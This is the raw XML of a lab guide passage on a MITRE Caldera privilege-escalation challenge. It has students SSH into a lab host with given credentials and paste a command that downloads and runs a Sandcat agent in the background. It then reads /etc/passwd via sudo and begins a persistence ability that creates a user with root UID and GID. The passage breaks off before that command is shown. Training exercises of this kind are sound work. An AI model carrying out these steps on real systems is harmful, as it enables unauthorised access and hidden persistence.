    <w:p w14:paraId="3CD33603" w14:textId="3F287542" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E274E1B" wp14:editId="1B704D9B">
            <wp:extent cx="5276215" cy="2201545"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="1160305099" name="Picture 1" descr="A screen shot of a computer scree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60305099" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="2201545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D2FA09" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B60CD4" w14:textId="1EE94668" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open your web browser and type into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchbar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00ED37AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8888</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and click enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B2467D" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2681FD" w14:textId="0A4C8D7F" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The login details </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667D64F" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF9A297" w14:textId="7A870DB3" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Username: red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9216B" w14:textId="06F73DA7" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Password: admin</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="7A5409B4" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF8EEBF" w14:textId="77777777" w:rsidR="00455558" w:rsidRPr="00D17B7C" w:rsidRDefault="00455558" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C43A525" w14:textId="1860E81B" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00660FF6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008A169A">
        <w:t>Caldera Escalation Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A23511C" w14:textId="77777777" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080726D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pre-Requisite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83458C" w14:textId="27D2EFB2" w:rsidR="00455558" w:rsidRPr="00455558" w:rsidRDefault="00455558" w:rsidP="00455558">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00455558">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALL FOLLOWING STEPS ARE DONE IN KALI-LINUX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4AB164" w14:textId="026A2B8D" w:rsidR="00EF4115" w:rsidRDefault="00EF4115" w:rsidP="008A169A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before starting the challenge, </w:t>
      </w:r>
      <w:r w:rsidR="008A169A">
        <w:t xml:space="preserve">connect to the target host via </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008A169A">
        <w:t>SSH</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4363F54E" w14:textId="77777777" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F2A238" w14:textId="19C99B86" w:rsidR="008A169A" w:rsidRPr="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A169A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A169A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> bob@172.20.0.</w:t>
      </w:r>
      <w:r w:rsidR="007C4605">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4E39F1" w14:textId="3C44E9B9" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>P@ssword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B10A080" w14:textId="77777777" w:rsidR="00EF4115" w:rsidRDefault="00EF4115" w:rsidP="00EF4115"/>
    <w:p w14:paraId="0587AF83" w14:textId="6F520387" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="00EF4115">
      <w:r>
        <w:t>Once you have gained access to the target machine, you can begin the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27828542" w14:textId="77777777" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Hlk142056828"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="4FDEC55C" w14:textId="77777777" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="00EF4115"/>
    <w:p w14:paraId="12CE6BEF" w14:textId="48BFDD76" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="00EF4115">
      <w:bookmarkStart w:id="4" w:name="_Hlk142056843"/>
      <w:r>
        <w:t>In Mitre Caldera, navigate to “agents” and create a new agent with the following parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250EE07F" w14:textId="77777777" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="00EF4115"/>
    <w:p w14:paraId="638BB8E4" w14:textId="619D6D9A" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sandcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00707C8E" w14:textId="7FAB0E4B" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Linux Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D629505" w14:textId="6415D481" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>app.contact</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="008A169A">
        <w:t>http://&lt;your</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KALI-LINUX </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address&gt;:8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDB1A73" w14:textId="59A4E629" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:r w:rsidRPr="008A169A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="261EA3D0" wp14:editId="18E80156">
            <wp:extent cx="5276215" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="999135224" name="Picture 1" descr="A screenshot of a computer&#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99135224" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="768B2160" w14:textId="7B084293" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:r>
        <w:t>scroll down to “Download with a random name and start as a background process” and copy the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AAC540" w14:textId="165B158D" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:r w:rsidRPr="008A169A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F567998" wp14:editId="4FD409E4">
            <wp:extent cx="5276215" cy="1485265"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="943756285" name="Picture 1" descr="A screenshot of a computer pr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43756285" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="1485265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4705F" w14:textId="77777777" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A"/>
    <w:p w14:paraId="484D211F" w14:textId="180594B9" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="008A169A">
      <w:r>
        <w:t>Paste the copied code into the terminal of the target machine.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="62E1D472" w14:textId="61CA93D2" w:rsidR="008A169A" w:rsidRDefault="007C4605" w:rsidP="008A169A">
      <w:r w:rsidRPr="007C4605">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3395CB56" wp14:editId="1259284F">
            <wp:extent cx="5276215" cy="622935"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="2116314535"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16314535" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="622935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE03B0" w14:textId="77777777" w:rsidR="008A169A" w:rsidRDefault="008A169A" w:rsidP="007C4605"/>
    <w:p w14:paraId="2AB45201" w14:textId="046DEFA4" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:r>
        <w:t xml:space="preserve">You should see the following in your MITRE CALDERA except with a different id(paw) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBE7AD" w14:textId="19961ED5" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:r w:rsidRPr="007C4605">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F298E5F" wp14:editId="3058BA5B">
            <wp:extent cx="5276215" cy="2142490"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1990286790" name="Picture 1" descr="A screenshot of a computer&#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90286790" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="2142490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE54540" w14:textId="77777777" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605"/>
    <w:p w14:paraId="6A791A7A" w14:textId="1CCD93B3" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:r>
        <w:t xml:space="preserve">Now that you have an agent deployed on the target machine, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do some reconnaissance to see what we are dealing with. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF8FCA" w14:textId="3ADE9D18" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605"/>
    <w:p w14:paraId="13169887" w14:textId="24015397" w:rsidR="007C4605" w:rsidRPr="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4605">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EEDB18" w14:textId="77777777" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605"/>
    <w:p w14:paraId="01F3001E" w14:textId="3A3B75B2" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:r>
        <w:t xml:space="preserve">This shows that we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>aren’t able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> read the passwd file due to low privilege access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E86DC03" w14:textId="1C648213" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:r>
        <w:t xml:space="preserve">However, a simple </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C4605">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> placed in front allows us to read the file no problem. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Hence</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can conclude that the user bob is in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148E6945" w14:textId="34D43A04" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> see how we can exploit thi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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21842F" w14:textId="77777777" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605"/>
    <w:p w14:paraId="42171760" w14:textId="0E3CCEA3" w:rsidR="007C4605" w:rsidRDefault="007C4605" w:rsidP="007C4605">
      <w:r>
        <w:t>In Caldera, navigate to “adversaries”</w:t>
      </w:r>
      <w:r w:rsidR="00CE7246">
        <w:t>. Create a new adversary profile with the following details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12832A" w14:textId="4BEDE102" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Profile Name: IAMINYOURWALLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE01E4D" w14:textId="23487FEA" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description: System persistence, creates a user with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and gid of root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9577AC" w14:textId="098D23AA" w:rsidR="008A169A" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="069DF792" wp14:editId="66E6ADFD">
            <wp:extent cx="5276215" cy="983226"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="190173571" name="Picture 1" descr="A picture containing screenshot, text, softwar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0173571" name="Picture 1" descr="A picture containing screenshot, text, software&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="983226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703E67F" w14:textId="16D61B06" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t>Create the profile and then +Add ability with the following details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC6557" w14:textId="5A9D327F" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tactic: persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33329F9B" w14:textId="0F230AD5" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Technique: T1136.001 | Create Account: Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A798A0" w14:textId="5F2A9013" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ability: Create a new user in Linux with ‘root’ UID and GID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6AFD82" w14:textId="6368233A" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D1C491B" wp14:editId="02E2D456">
            <wp:extent cx="5276215" cy="778046"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="1257365700" name="Picture 1" descr="A screenshot of a compute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57365700" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="778046"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="254062EF" w14:textId="55C553CF" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t>Under Payload, select ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sandcat.go</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338DDAD" w14:textId="42B23795" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r w:rsidRPr="00AD1BA3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0B399A" wp14:editId="760ED9A3">
            <wp:extent cx="5276215" cy="1320515"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1595425749" name="Picture 1" descr="A picture containing text, software, multimedia software, fon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95425749" name="Picture 1" descr="A picture containing text, software, multimedia software, font&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276215" cy="1320515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9C68F1" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
    <w:p w14:paraId="635267F2" w14:textId="754E94C5" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246">
      <w:r>
        <w:t xml:space="preserve">The following default command will not work so we will have to edit it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFDE8E6" w14:textId="77777777" w:rsidR="00CE7246" w:rsidRDefault="00CE7246" w:rsidP="00CE7246"/>
